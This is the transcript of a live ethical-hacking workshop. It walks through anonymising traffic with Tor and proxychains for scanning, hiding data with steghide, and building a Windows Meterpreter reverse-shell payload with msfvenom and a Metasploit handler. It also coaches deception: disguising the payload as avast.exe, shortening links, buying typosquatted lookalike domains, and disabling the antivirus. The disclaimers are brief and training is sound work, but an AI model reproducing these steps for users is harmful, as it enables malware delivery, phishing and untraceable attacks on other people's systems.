Hello everyone, welcome to ISOEH. I hope I am visible. Okay. Can you guys just tell me in the chat whether you can see my screen or not? Am I audible to you guys? Good afternoon everyone. Can you guys hear me? Am I audible? Just write a quick yes in the chat, please. Okay, thanks a lot. All right then. Okay. Welcome to Indian School of Ethical Hacking. In our today's live session, we are going to see some of the things that are related to hacking. That is, today we have some agendas, like we will be seeing how you can hide your IP addresses, right? How you can hide a particular data inside a media file, and we will also see a bit of system hacking, and we will also see a bit of web part. Okay, let me just first introduce myself. I am Sagar Nyogi and I am a certified ethical hacker, and today in this live session I am going to be your host. Okay, all right then. Okay, so today in our live session, one more word of caution. Today I am not going to use any kind of a Kali Linux or Parrot operating system, as you have heard in other YouTube videos where they use those things, right? And I have heard people say, okay, you don't use Kali Linux, okay, you are not a real hacker. Okay, you don't use Parrot OS, so you are not a real hacker. Actually, the operating system does not matter. You can actually do the same task in Windows or in any Linux, you can do it. Okay, so today we are also going to bust that myth as well. Today I am going to show you how you can actually install all these tools in your own Linux system. It can be Ubuntu, it can be Manjaro, it can be any Arch based system, does not matter. Okay, so we will go step by step. Okay, first of all, we are going to see how you can hide your IP addresses and what are the tools required and what are the things that you are going to need and what are the things that you are going to configure in your Linux system to do that, to achieve that. Okay. All right, let's start. First of all, let me just check my public IP address. So if I just go here and if I just check what is my IP, if I just type IP, I should be able to get some search results. Okay, so if I just check what is my IP, it is retrieving my information. I have to wait a bit. Okay, fine. So this is my public IP. Okay. Don't bother even if I show my public IP in the live chat, in the live video, does not matter to be honest. Okay, so I am residing in Kolkata and it's in West Bengal. Fine, so this is my public IP at this point of time, right? So if I try to perform some kind of an attack on any website, or if I am trying to hack somebody, obviously their system logs are going to register this IP address, right? So whenever you are trying to perform some kind of an attack on a particular website, it is recommended that you hide your IP addresses. Okay, now today we will see how you can do that. All right, so I will just boot up my Ubuntu system. No Kali, no Parrot. Okay, so here is my vanilla Ubuntu. I've just installed it, and I have installed a few of the tools beforehand, and I am going to walk you through how you can do those same jobs in here as well. Okay, so we'll first of all fire up the terminal here. All right. Okay, now if I just check the IP address over here, I should be able to get the same public IP. Let me just check here first, a quick check. Okay, it's fetching my IP address. And as you can see, it's the same IP address that we have seen before, right? Okay, since this this virtual machine is in bridged mode, and since it is connected with my machine actually, so both of them will be using the same public IP, right? So what I want to do, I want to hide this public IP. This public IP should not get logged into the other website's log file, right? So what I can do here is, in my Ubuntu system, first of all, I am going to install a few things. First of all, we are going to install Tor as a service. Okay, just give this command sudo apt install tor and it will start installing this. Just hit a Y here and hit enter. Okay, installing. Alright, fine. So our installation is complete here. There is another thing that you need to install. Sudo apt install proxy chains. Now we are going to use some proxy chains here along with the Tor service. Now there are two kind of proxy that you can use. Either you can use a system-wide proxy, or you can use software-based proxy, or a proxy for a particular software that you want to run. Okay. Now, if you are using this method, that after installing Tor and proxy, if you are using this method where you are using Tor and proxy chains, then what you are going to achieve is software-based proxy. Like if you want to run a particular software with a proxy chains configured in it, then you can use this technique. Okay. So first of all, we have installed Tor and we have installed proxy chain as well. Now what we need to do, we need to configure it. So we will just go as a root user. All right, so I'm a root user here, and then we will go to etc proxy chains. Once you have installed proxy chains, that should be here. Okay, proxy chains.conf. Okay, it's a directory, sorry, my bad. So it is going to be nano, or you can open it in any text editor, doesn't matter. Okay, so we are going to like comment out the strict chain, and we are going to uncomment this. Okay, so we have that random chain over here. There should be some kind of dynamic chain. Okay, just uncomment this random chain. Okay, so we have dynamic chain above. Anyway, forget that. We will just uncomment this dynamic chain. We don't need a random chain. Just uncomment this dynamic chain. So what I did, I just opened up this etc proxy chains.conf. I commented that strict chain and uncommented that dynamic chain. Right? Then go down, and in here we already have SOX proxy SOX 4 added up here. All you need to do is add SOX 5 as well. So we'll just add SOX 5, give a space, 127.0.0.1 and 9050. Just keep it same. That's it. Save it with Control S and then exit it with Control X. Okay, it will get saved there. All right. Okay, so our proxy chain configuration is done. Now what we need to do, we need to start our Tor service. So what we will do here, we will just start it service Tor start. Okay, so this will start this Tor service. Now what I'm going to do, I'm just going to close this Firefox of mine, and we are going to use proxy chain to open Firefox. So what we will do, we'll just hit proxy chains. Okay, now in Ubuntu, just keep in mind, in normal Kali Linux, if you are a default root user, you can open up your browser easily. Now since we are in Ubuntu, if you try to open Firefox as a root user, it won't open up. So what we will do, we'll just go back to our normal user, and then we will hit proxy chains Firefox, and this should fire up our Firefox using that proxy chain. Now if I try to check my IP address, let's see what we get. Right, now we want to just search for IP address. Okay, now this happens. So if you are like if you are trying to use proxy chains, or if you are trying to use the Tor service, Google is going to think like you are not a human being, right? And we face this issue many times. So you have to first of all prove that you are a human being. Yeah, that's how it works, unfortunately. All right, traffic lights, I'll just select them. It can be pretty annoying sometimes though. All right, so I am not a robot now. Thank God. Okay, so we get some kind of a other language. Okay, I think it's Russian probably. Okay, so what do you guys think? Is it Russian or what it is? Comment in the chat box. Okay, so as you can see, the language has completely changed. So hopefully, let me just check my IP address here. Obviously at this point of time, I am not in Kolkata. I am not in India. My IP address is not residing in India or Kolkata. I think it is coming from Russia. Let's check if the public IP is showing somewhere. Okay, so this is my public IP now, 51.195.150.139. As you have seen earlier, the public IP was different, but now the public IP is different. Okay, now keep this thing in mind. If you are using this particular technique of proxy chain and Tor, then whatever software you are going to open with the help of this proxy chains, only that will use that particular proxy chain. Rest of the software will not. Okay, say for example, if I open up another instance of this Firefox, okay, in a new window. Okay, so we have got two Firefoxes open. One is running in the proxy chain and the other one is the normal one. So if I just type IP here and if I try to check the IP address over here, okay, so it is also showing me the same thing. I think it is getting those data from there. All right, so yeah, so if I had another browser, I could have shown. Anyway, fine, that's fine. So what if I want to check it from this browser, from my main machine? If I try to check it, let's see what it gets. Okay, as you can see, it's the same thing. All right, with the ISP name and the Kolkata and rest of the things are the same, but the proxy chains, when I am using the Firefox with the proxy chain, it is giving me some other IP address from some kind, from somewhere in Russia. All right, so this is one of the method how you can hide your IP address, how you can hide your public IP address. Obviously you can use this proxy chain with other softwares as well. Say for example, if you want to scan a particular network, okay, and now as some of you might have already are familiar with Nmap, which is a network scanning tool. Those who are not, don't worry. Nmap is a command line tool which helps you to identify network vulnerabilities and scan for open ports. Okay, now you can do that for any system which is connected within the same network or a public IP. Okay, now it is pretty prevalent in our a zone that that Nmap is a pretty noisy software. Noisy means like if you're trying to scan someone's IP with Nmap, and if that IP address or if that machine has some kind of a log working on it, then it will be able to log all this data. Okay, all that data. Now what you can do, you can actually use Nmap with proxy chains as well. So say for example, if I want to scan Google's IP address, now I hope you guys know how you to find it. So if you just ping google.com, you will get the IP address of Google. So there it is, the public IP of Google. So I'll just copy this and we will try to scan that. So what we will do, we'll just use proxy chains, Nmap, and the IP address, just the normal scan. So while this scan is happening, my public IP is not getting sent to the Google server, not into this IP address. Okay, so which IP address am I using? I will be using that Russian IP address, whatever I have been provided with. Okay, so as you can see, these two ports are open. Obviously, if there is a log going on in this IP address, then they won't be able to register my public IP. Instead, what they will be registering will be my the IP address that we have got from Tor. Okay, so this is one of the way how you can use it. Now if you don't use it, don't use proxy chains. If I just fire up Firefox normally, okay, if I just fire up Firefox normally, and if I try to check the IP address now, it is going to show me the public IP that I have right now. Okay, so it is actually fetching the cache, I think. Okay, so if I just clear up the cache, it will be showing my IP address, the actual IP address. Okay, so as you can see, the normal one now. All right, so this is one of the way how you can hide your IP address. Now let us find out how you can do a system-wide proxy. If you want to use a system-wide proxy, like you don't want to fire up proxy chains every time you want to run Nmap or SQL map or whatever the attack vector you are using, then in that case I will recommend you use Kalitorify. Now Kalitorify is a pre-built script in GitHub. Now to download anything from the GitHub and run it, for Ubuntu, what you are going to need is, first of all, you need to install Git. So first we will go ahead and install Git. Sudo apt install Git, and since I have already installed it, it's there. Those who have not installed it, for them it will get installed. Okay, once you have installed Git, now you are good to go and get any file from GitHub. So I'll just become a root user here, and we'll go to Firefox, and in here I will just search for Kalitorify. Okay, just go to the first link. Alright, so this is the Kalitorify's GitHub page. We'll just click on the code, we'll just copy this URL, just click on this one and we'll just copy that URL. We'll minimize it, and in here we will give the command git clone, and we will just paste it with Ctrl+Shift+V. Alright, it's done. So once we have downloaded these files, so if I do an ls, so as you can see Kalitorify right over here. So we'll go to Kalitorify. Okay, we'll hit an ls. So these are the files that are inside Kalitorify right now. Now what you need to do, you need to give a command make install, so that you can fire up Kalitorify from anywhere in the terminal. You don't have to like go to that directory and run this kalitorify.sh again and again whenever you want to run that Kalitorify. So we'll just hit make install, and it's done. So now what we can do, we can just fire up Kalitorify easily. So Kalitorify. Now okay, before starting with Kalitorify, there is another service that you need to run. Service .start. First of all, you need to start this service. Okay, so as you have seen in the previous method also, we had to start this .tor service. Here also you have to start this .tor service. Okay, once you have done that, you are good to go. Kalitorify -t, that's it. Hit enter, and it should do its task automatically. Another point is like in the previous method, there was another drawback, that if you had IPv6 address, then using Tor and proxy chains would not suffice. In that scenario, it is recommended that you use Kalitorify. The Kalitorify is way better than your normal Tor and proxy chain method. Okay, so as you can see, we have got some IP address and we are in Switzerland now. Congratulations! Even in Corona-like situation, you are sitting in Switzerland. Okay. Fine. All right, so this is the IP address that we have. Okay, so let me just check a quick check. So I will just start a new session. So if I just check my IP address over here, all right, so I'm not a human again. Okay, let's see. Google loves traffic lights. Yep. Okay, it can get pretty annoying sometimes. Crosswalks. Okay, I don't see any crosswalks here. Okay. Okay, this time I think it has changed again. I don't know what is. Convert this to English. I think I agree. Okay, so I get an IP address of somewhere, I guess. Alright, so if I check my IP, probably this should show me the IP. Okay, so this is my IP address 82.129.8.4. So as you can see, it has changed again. So that is another benefit of your Kalitorify. Okay, so right now this is my public IP at this point of time. Okay, it can detect that I am using Ubuntu, it can detect that I am using Firefox, fine, no problem, my resolution as well, but the main thing, it is unable to detect my original IP address. Okay, so in this way you can hide your public IP address. Is it clear for everyone? All right. Okay, a quick question for everyone. I want to see the answers in the chat. All right, so can anybody tell me which is the service that I switched on in both the cases? Which service I switched on in both the cases? Come on, I want to see answers in the chat. Okay, someone wrote that, sir, you are not human. Okay, Google thinks so. I can't help it. Okay. So what is the answer? Come on, guys. Absolutely, absolutely. Yes, yes. Yes, I can see the answers. Very good, very good. All right. Shumon Nath, Somajit Das, Subham Hernandez. Okay. Roop Sharkar, Ankit Jha. All right, all right, all right. Everyone is correct. Correct. Everyone is correct. Okay, so Tor service is the common service that you need to switch on because it's a free VPN service that you can get and free proxy chain service that you can get. So basically, if you ask me what is the free like how you can change the IP address without wasting money on free VPNs and all that, on paid VPNs and all that, you can use this method. Okay, but this does not guarantee complete privacy or complete anonymity. Keep this thing in mind, guys. Becoming completely anonymous is a myth. Okay, it happens only in the movies. Okay, now you can ask like, okay sir, if you are saying that complete anonymity is a myth, you cannot become completely anonymous, then how come some of the hackers don't get caught? Okay, now for that answer, to be honest, they are backed up by some other forces. Now I don't want to mention those. So they do get backed up by other forces. So that is the reason why they don't get caught. If a government decides yes that this hacker needs to get caught, he will get caught. No matter if you are using Tor service or whatever, a simple phone call to the Tor services or the Tor office can reveal your identity, that you are using, that who used this particular IP address and from which area it generated. Okay, this does not guarantee complete anonymity. If you do something bad, it's up to you. Okay, and another word of caution to you guys, whatever you see in this video are for educational purposes only. This is just to mention how hackers work in real life. If you know how hacker works in real life, then you can actually be aware of certain things. You can save yourself. Okay, it's just like like Avengers. Okay, Thanos is also has superpowers, and Thor also has superpowers, right? But they both use those superpowers for different reasons. Okay, so you will be getting superpowers when you are a hacker, but you should be using it for good purposes, not for the bad ones, because bad ones really end up bad. Okay, it's not a good path. Okay, anyway. Okay, so someone is asking like, sir, can you explain what you did in nano etc proxy chain.cunf par during the hiding public IP? Yes, of course I can. Basically what I did, there are three kind of chains when you are using proxy chains. Either it is going to be a strict chain, it can be a dynamic chain, or it can be a random chain. Now what a strict chain is, like if you will be provided a public IP address, a random public IP address, now that is going to stick with you. Okay, for the rest of the time whenever you are using proxy chains. Okay, but if you are using a dynamic chain or if you are using a random chain, in both the cases you will get different IP addresses depending upon how the server is working, how the proxy chain server is working, or how the Tor service is working. All right, so if you do that, you will get a different public IP address probably every time you log in or something like that. Okay, for that reason I did it. Okay, Okay, some are actually going to try all this after this workshop. Of course, you can try this, no problem. You can try it in your own system, no worries. But don't try to do this on someone else's PC, okay, without their consent, okay. All right, gray, white. Okay, someone is asking, sir, what about you? You are a gray hat or a white hat hacker? Okay, I am of course a white hat hacker. Come on. Okay, please, मेरे ऊपर शक मत करना. All right, let's go ahead. Fine. All right, so we have seen how you can hide your IP addresses. Now we will see how you can actually hide the data, hide a particular data in a media file. Now it can be any kind of a media file, it can be a video file, it can be an audio file, it can be an image file as well. Okay, now how many of you have like seen Mr. Robot in the chat box? Come on, how many of you have seen how many of you have seen Mr. Robot web series? Come on guys, some of you must have seen it. Netflix नहीं देखते हो क्या? I don't see any answers. So haven't you guys seen Mr. Robot? Okay, fine, no worries. Okay, now I am getting the replies. Okay, now let's see if you have seen Mr. Robot. In the first season, I guess there was a place where Elliot used to hide whatever he is hacking and whatever the data he is collected inside a CD, right? Inside a CD, inside music file, he will write the name of the songs and he will store in the CD rack, right? Now what he is doing, he is actually hiding that data inside a media file. Now why he is doing that? Basically, if someone comes to his place and opens up those, if someone tries to search what he has done or what kind of a data he has, now he will come across these CD files, right? CD. Okay, now whenever the CD is played, that music file will open, but the hidden files will not open. It can only be opened by someone who has put those file in it, or someone who knows how to extract it. Okay, same goes for the image file as well. Okay, now this is one of the way how terrorists communicate between themselves, and you will see soon enough. So let's see how you can do it. So we do have an image file over here. I have downloaded one image file, and let's see. Okay, so I have an image file. So if I double click on it, it's a simple image file, nothing too fancy, nothing anything else, right? Tom and Jerry and all. Okay, Tom and Jerry देखे हो ना हर कोई? हाँ, I think सबने देखा है. All right. So what we were going to do here is we are going to install a tool called Steghide. Okay, so we'll just hit apt. Okay, if you are a normal user, then you will just hit sudo apt install Steghide. We are going to use a method called Steganography. Now if you guys want to know about Steganography, if you want to guys know more about Steganography, you can just Google it. I won't be able to explain this, explain the methodology or the algorithm that is working behind Steganography in this video because of lack of time, and it is out of the scope of this video. So if you guys are interested, you can just go ahead and Google it. Okay, so this is just Steghide, and we are going to use this Steghide to do these tasks. All right, so we have image.jpg, and we will just create another text file here. Just go ahead and create a text file. So we'll just hit nano and say hide.txt. Okay, and in this hide.txt, I am going to write something, secret message. So this is a secret message. Secret message. Okay, this is not to be seen by normal people. I have saved all the data in my cloud, etc. So I have just saved it. So it's a normal text file. So if I just open this, it's a normal text file. Okay, now what I want, this text file should get embedded in this image file. Okay, so if I want to hide this text file inside this image file so that only this image file exists and not this hide.txt, So if I just double click on this, the image file will open up as normally, but the text file will not open up. Only the person who has hidden it, or the person who knows how to extract it, can only open it, except no other else can open it. Okay, so what we are going to do here is we'll just open the terminal over here. We'll become the root user, ls, and we have the image file and the text file. So we'll just fire up steghide. Okay, steghide, and then we will just give this command --embed -ef. The -ef will represent the embed file, like the file which we are going to hide, that is hide.txt in this case, and -cf for the cover file. Cover file means in what file I am trying to hide that data. So it is going to be image.jpg in our scenario. And to make it more secure, you can just put a -p, so that you can give a password for it. So even if someone knows how to extract it, he will need the password to extract it. Until and unless he knows the password, he won't be able to crack it. So I'll just give the password as hacker. Okay, and hit enter. Alright, so there we have it. So our embedding is complete, right? So as you can see, embedding hide.txt in image.jpg is done. Alright, so now what we are going to do, we are going to erase this hide.txt. I'm going to delete this hide.txt completely, move to trash, and we are going to clean it from the trash bin as well. So here is the trash, here is hide.txt. I'm going to delete it completely. Okay, now it does not exist in my system, it is deleted completely, only the image file is here. So if I double click on this image file, it will open up the image file only. Okay, just the image file. You send it via WhatsApp, you send it via Facebook, does not matter, it is always going to be an image file, but that hide.txt is hidden inside it. Now let's see if I can extract this. So if I just give steghide -extract -sf, that means stego file. In this scenario, the stego file is image.jpg. So I will just hit image.jpg and then hit enter. So it is asking me the password. If I don't need the if I don't know the password, I won't be able to crack it or open it. So I will just hit hacker, hit enter, and as you can see, wrote extracted data to hide.txt, and you can see a little hide.txt over here. Let's just read that, cat hide.txt. Let's see if the text file is there or not, and there it is. Okay, your message is there. All right, did you guys get it? So basically I have hidden the text file inside that image file, and if you send it to somewhere where only that person can read it, so there you go. That is how you can actually hide a text file inside an image file. Now you can do it with any other file except exe or executable files. You can hide a programming file inside an image file, you can hide a programming file inside a video or an audio, you can hide txt file inside audio or video, you can do that. I left those experiments to you guys. Okay, I leave those experiments to you guys. You guys try these at home, no problem at all. Okay, now in this way, now if I have hidden some kind of a map or some kind of a secret data inside that image file, and if I have sent it via WhatsApp, where WhatsApp is end-to-end encryption though, and even if someone is able to listen to my chats, he will be only seeing that Tom and Jerry image. Okay, and whenever he is clicking on that image, he will be only seeing this image, but not the data as we have seen, until and unless someone with this knowledge can extract it. Once extracted, he will be getting that text file, otherwise no one can extract it. All right, okay, so we have seen two things here, how you can hide your IP address and how you can hide your data. Okay, so someone is asking, can we hide payload? Okay, now to tell you the truth, yes, you can hide payload in an image file, in a PDF file, in a Word document, in an Excel document. Yes, you can do that, but not using steghide. Okay, steghide won't be able to do that. If you want to do that, a word of a bonus thing, a bonus point, try to use WinRAR. Try to use WinRAR. It has so much power. You can do so many things with WinRAR. Okay, the experiment is up to you. All right. Okay, someone is asking, sir, if there is a link embedded in that image and someone opens that image, will the link also open? Yes, you can code it like that. So basically, if you can, yes, that is possible. That is possible, of course, that is possible. If you open the image, another link will get opened up. Now that is possible. You have to code that image like that, as such. You have to make that image as such. If you are creating a web page where there is an image, clicking on that image and opening a new tab and opening a new a link is pretty much easy to do. But if you are talking about the normal image that we have downloaded over here, doing that is a bit difficult, but it is not impossible. Okay. WinRAR, yes, absolutely, WINRAR. Alright, so we have seen two things here, IP addressing and hiding data, right? Now let's go to the next agenda. Our next agenda is how you can hack a system hacking. A bit of today we will be discussing basics of system hacking basically, and we will be seeing how you can create a payload for Windows 10 system. We won't be using the old Windows 7 and Windows XP, those are too old for us now. So we will be hacking Windows 10 here, right over here. So I will be hacking my main system. My main system is Windows 10, so I will be hacking my main system over here, and we will see how it is done and what else, what can you do, what can you achieve from that. Okay, now first of all, for doing this you are going to need a tool called Metasploit. Okay, now Metasploit comes pre-installed in Parrot or Kali, but since we are using Ubuntu, it does not come pre-installed. Now we have to install it. Now how we have to do, let's see. So first of all, you become a root user. Okay, once you are in the root user, you need to download a few things. You need to first of all download apt install PostgreSQL. This is the first thing that you need to download. Why you need PostgreSQL? Because sometimes if you are using Metasploit, Metasploit is a tool, you can just Google it and see what it does and what not. And Metasploit uses a database in its background, and the database that it uses is PostgreSQL. That is why we are going to install it. Apt install PostgreSQL. Along with this, we are going to install curl. Curl is a tool which actually helps you to fetch particular files from an FTP, and it also helps you to see the reply of your response to a particular website. Anyway, so we are going to need these two things, and yeah, I think that will suffice. Okay, so I already have these two installed in my system. Once we have done this, we will go ahead to our Firefox and we are going to search Metasploit in Ubuntu. Okay, now you can see so many links over here. We don't need all these links. We only need the links from Rapid7. Now, who is Rapid7? Rapid7 is the creator of this Metasploit. Okay, so we will just search for that only, and okay, so there it is, installing Metasploit framework, docs.rapid7.com. Yes, Metasploit framework. I agree, let's go. So if you go down here, it will tell you how you can install Metasploit in your Windows system. Don't bother this, it is not going to work properly in Windows system though. Okay, if you just scroll down, you can see how you can install Metasploit framework on Linux. Now this works for any Linux. Okay, so what I'm going to do, I'm going to just copy this thing. I'll just copy this and we'll paste that. Once you hit enter, it is going to download and install Metasploit framework for you. Hit enter, and it's going to download and install it. It will take some time. Okay, so I think I have already installed Metasploit framework in my system, so it is showing that it is already in the newest version. But for you guys, it is going to take some time. It is going to download and install Metasploit framework. Okay, Now once you have downloaded the Metasploit framework, once you have installed it, go ahead and start the service PostgreSQL. Alright, fine. Now you are good to go. Now you can go ahead and create payloads. In other words, you are going to create virus for your Windows 10 system. Okay, now we are going to create viruses for our Windows 10 system. So here we go. So msf venom -p, this is the command. I will explain each one of them, don't worry. Windows Meterpreter reverse TCP lhost, where lhost is my local IP address. I can just check it by using ifconfig. So this is my local IP address, this is my private IP, that is 192.168.1.61. I'll just put it, and L port equals to, just put it 4444. You can put any port number which is not busy, right? -f exe, and then you can just name it anything. Now this is where your social engineering skills come. Now you should name your payload or name your virus as such that you can easily fool the user. Okay, say for example PUBG. Okay, PUBG.exe. Okay, PUBG.exe, you can name it PUBG.exe, you can name it PUBGLite.exe. Okay, or you can name it like Windows Update.exe. Okay, you can name it like Windows Update.exe, or better, avast.exe. Okay, antivirus hai, right? Who will suggest, who will think that it is going to be a virus, right? Manipulation, correct? So avast.exe, will just keep it as avast.exe. Okay, just hit enter. Okay, while it is creating this payload, let me just explain and go through this command. msf venom is the module name. Okay, the name of the module through which you are going to create that a payload. Create that payload. -p means the type of payload that you are going to create. Now there are so many types of payload. I will show you guys. Like there are literally, I think 2000 different kind of payloads inside Metasploit, near about. All right, and this is the type of payload that we are going to use. We are going to use a Windows based payload. We are going to get a Meterpreter session. Now what is this Meterpreter session? You guys will soon see. And what is the difference between a Meterpreter session and a normal session? We will soon see, don't worry. And then what kind of connection it is? It is going to be a reverse TCP connection. Now, what is a reverse TCP connection? Let me just show you guys. So let me just consider an example. Say this is the hacker. Okay. And this is the victim. Okay. In normal scenario, what happens? The hacker sends some kind of a request or sends some kind of a link or something, and then the user will click on that, and what will happen from that user, data will come and will get received by the hacker. This is the normal scenario. In this case, there is one major drawback. The one major drawback is if there is a firewall, a normal firewall. I'm not talking about like those hardware types or big company types like Fortinet or SonicWall, not those. The normal Windows firewall. If there is a normal firewall, then what will happen? This incoming connection might get dropped because of firewall feeling that it is suspicious in nature. So if that happens, what we can do, we can actually, there are okay. Let me just give you this example. You want to meet with your friend. Okay, you want to meet with your friend, you haven't seen him for the last 6 months since the COVID started. Okay, now there are two ways of doing that. One, you can either go to his house and meet him, okay, or you can call him outside somewhere, someplace, and meet him there, right? So these are the two ways. Now due to the COVID reason, you cannot go to his house for some reason, like in his house, like there is some restriction. Okay, so you cannot go to his house. That means what? There's a firewall. Okay, so you cannot enter his house. But if you call him outside, the firewall might allow him, right? So what we are going to do in this scenario, what reverse TCP does, basically we are going to send some kind of a software inside this system. We are going to send some kind of a software to that system, which the system will trust. The moment the user double clicks on this software is going to generate a connection between this system and us. okay, between this system and us. Let us see in real life how this is going to happen. So here we have created the payload. Now we need to send this payload to my Windows system. Okay, now there are millions of ways how you can do it. You can actually upload this somewhere. You can actually create a link. Do not upload this to Google Drive or VirusTotal. Please don't do it. If you actually upload it to Google Drive, it is going to delete it, suspecting it as a virus. But you can use other cloud services like OneDrive or Mega or something like that. There are many other cloud services, right? And you can actually upload it, generate the link, and you can share the link with your victim. Okay, so here we have it. So there it is. And what we are going to do, we are going to actually put this payload to our local host. That way I can actually get it. So I'll just go to ls. So we have this avast.exe. We'll just cp avast.exe and we'll just send it to var www html directory. Okay, once we have done that, we will just start service apache to start. Now you don't have to do these things because I am actually trying to send this into my own system. So I am just uploading this virus to the local server, and we will be retrieving that virus from this local server, right? So that is why I did that. Now we get a link, right? So what we have here is 192.168. Okay, so what is the IP address over here? Let me just check it quickly. So it is 1.61. okay, so we have like 1.61 61/avast.exe. now this is the link that the user needs to click on so that the software gets automatically downloaded into his system. Okay, now if you send this kind of a link, the user might get suspicious, right? So what you can do, you can just copy this and you can actually use tiny URL or any kind of a URL shortener. You can use bit.ly or anything like that, right? We always see this kind of shortened URL nowadays, right? So we'll just paste this, we'll make tiny URL of it, and there it is. Okay, nothing to suspect, right? Nothing to suspect. Now you can actually upload this by buying a domain as well if you are too much hellbound on hacking someone. Okay, don't do that. Anyway, so if you want, you can just go to you can just go to GoDaddy and search for similar websites. Say a website that will have a common name kind of a thing, where the user will see this name and will understand, okay, I trust this website. Something like amazon.com. Now if you look at it carefully, I have written the spelling wrong. Okay, so if I just search this domain, let me just search whether it is available or not. So as you can see, it is available. So I can actually buy this domain and upload this avast.exe to here. Okay, I can upload this, or you can also do something like, we can also search something like avast.com. now if you look at this, the spelling is wrong. I can just actually search for this and see if it is available. Okay, so it is available. It is quite costly though, but it is available. Okay, so you can actually buy this, or you can actually buy this one, avast.org. Okay, it is, you can do anything like avast.info. You can also buy that one. So if you buy this domain and upload this .exe to that a domain, and you can just send that link to the user, so the user won't even think twice. He can see that, okay, Avast, it is from their website only, right? What is to worry about, right? Once it goes there, and if I click on this one, it will get automatically downloaded in my system. So hopefully it does the job. So 1.61, hopefully it is able to open this. Let me just check once first whether the Apache is working correctly or not. Just a moment, guys. It is 1.27. It should be able to open it. It does take some time. Alright, let's just check again. Okay, it's taking time. It is not even opening this one. Okay, let me just check whether I am giving the IP address correctly or not. It is 192.168. Okay, let me just check again. Yes, it is 1.61. Apache service is running. One dot 61. Okay, I guess there is some kind of a problem with this Apache server. No worries, we can send it in other ways as well. Okay, but if you host it, then it is accessible from any website, right? You can just access it from anywhere in the world. All right, so I will just send it by using Python simple HTTP server. So I'll just stop this one. Stop service tor stop. I think it can be due to the tor as well. Okay, so we have that exe over here. So I will just hit python -m simple HTTP server. Now don't bother with this method. This is just what I am just creating a local server here. Okay, just to send that exe file into my main system. That's it. So if you guys are planning to do some kind of large attack, then go for the domain one that I have discussed earlier. So I will just go here 192.168.1.61 and port number 8080. Okay, for some reason it is unable to access my Ubuntu system. Okay, I think there is some technical problem with this system of mine. Just a minute, guys. Okay, so there is the avas.exe. Can I just drag and drop it over here? Nope. Can I paste it? Nope. Okay, let me just open up another browser. Let's see and check 192.168.1.61 :8080. Am I able to ping my Ubuntu system? 681.61. Okay, it is unable to ping. Just a moment, guys. I think something is wrong with this area. Just a moment. Connect. It is 1.27. The IP address is 192.168.1.61. It is correct. 1.61. Okay, I think there is some kind of an error, so let me just check real quick. Alright guys, just give me a moment. I will just reboot my system once, reboot this Ubuntu once. I guess now it should work. Settings, is it in bridged? Yes, it's in bridged. Okay, I think this should work now. Yes, I just checked it. It's in bridged. Come on, start up. Okay. Alright, hopefully this time this will work. Welcome to the world of hacking. This happens. Okay, so let's just see. Root user. I'll go to the root directory and there is my avast.exe. I will just start service Apache to start. Okay, I should be able to get it now. I have configured, so we have 192.168.1.61. Let's just check it in our browser. 192.168.1.61. Alright, so now it's working fine. Okay, now we will just give a slash over here and put avast.exe, and the moment the user clicks on this link, avast.exe download will start. So I'll just save this, and you guys already know how to manipulate the user. So here we have it, avast.exe. Fine. Okay, I don't need to cut this one, so I'll just minimize this. Okay, so we have actually sent the avast.exe. Now in the meantime, what we will fire up? We will fire up MSF console. It will take some time to start up. Now if you have installed Metasploit framework, then this should work absolutely fine. Okay, there we go. As you can see, there are so many exploits. Okay, let me just tell you a bit about Metasploit. Now Metasploit is a tool with the help of which you can create payloads. Now as you can see, there are so many tools here. So there are near about 2000, more than 2000 exploits. Now these will include different kind of exploits, including Windows exploits, Linux exploits, Mac OS exploits, Android exploits, iOS exploits, and many other things. Okay, the auxiliaries are the scanners. So if you want to scan for some kind of vulnerabilities, then you can use these auxiliaries. Okay, these auxiliary modules. We have 352 post. Post means post exploitation. After exploitation, if you want to add a bit more functionality into it, say for example, after exploitation you want to extract the password of that Windows system. Okay, then you can do that. Okay, or say for example, after exploitation you want to run some kind of a privileged command. Now what that is, I will show you guys, don't worry. There are 592 payloads, different kind of payloads. Okay, now whatever we did just now, MSF, Venom and payload, whatever we have done before, that is one of the kind of payload that we use. That is a Windows based payload. Okay, we have 45 different kind of encoders. Now they don't work, to be honest. There are 45 encoders. Basically these encoders are there to help you hide from antivirus, but nowadays antivirus are behavior based, so that is why all these encoders do not work properly nowadays. Okay, we have 10 knobs and 7 evasions. All of these are used to, you know, evade the firewall and evade the antivirus as a whole. But that does not happen nowadays. Okay, each and every day Windows is upgrading and updating itself. Even if you come across even if you come across a particular payload which is undetectable by the antivirus, just give it an hour and it will become detectable. It really happens. It has happened with me and many other people. I just created a payload with C programming. It worked with Windows with its antivirus on, and nothing could detect it. But just after 1 hour, it is able to detect it and delete it completely. So that is how fast Windows work. Okay, it has become behavioral based. Now if you ask me, Windows Defender is one of the best antivirus that you can have. No need to buy Avast, no need to buy any paid antivirus. Windows Defender is the #1 antivirus out there. Okay, fine. Alright, so what we will do here now, we will just run this command, use exploit multi-handler. Okay, and then we will set the payload. Set payload, you will just give the same payload that we have given earlier. It is going to be Windows Meterpreter reverse TCP. Okay, then if you go and give show options, this will tell you what are the things that this particular module, this multi-handler module, needs to run. So if you look at this portion, it is going to need these 3 things. Okay, and here in the required section, as you can see, these three things are required. Now if already value is provided there, okay, and it is written yes, you don't need to change it. Okay, but if it is written yes and no other value is provided over here, then you need to give some kind of a value. Now L host here represents the local host, that is your own IP address. Your own IP address means this machine's IP address, okay, from where the hack is initiated. So what I will do, I will just set L host to be my IP address 192.168.1.61, so that the connection comes back to me. Okay, everything is fine. I will just hit exploit and wait for the user to double click on my payload. Okay, I am just waiting for the user to double click on my payload. The user is very happy. He has downloaded a antivirus for himself. He will just go to the downloads folder, and we have, okay, now where did it go? Okay, where did it go? Where did it got downloaded? Okay, just a moment. I think, okay, file moved or missing. I think, did I delete it? Okay, just a moment guys. I think I need to run this again. .exe. Oh sorry, it is 61. Save the file. Okay, and as you can see, there it is, avast.exe. we have it here, and the moment the user double clicks on this one, obviously nothing will happen much. Since this is a normal payload, you can actually avoid these things. They are much more complex payload. This is just a basic payload. Okay, this will show up, don't worry, it's just a basic payload, that is why it is showing up. So we'll just run this, just a moment. 168.61.1 TAT, sorry, I just wrote it wrong, 1.61 8080, oh pardon me, 192.168.1.61, and yeah, this should do it. avast.exe. Alright, so we'll just keep it, cancel, show more, we'll just keep it anyway. Right. Fine, so we'll just run this. Okay, operation did not complete successfully because the file contains, okay, so I think my defender is on. For that reason it might be, you know, showing this thing. Yep, as you can see, my defender is on. For that reason it was showing me this. Alright, so I have switched off the defender now. I should be good to go now. So I'll just hit double click. 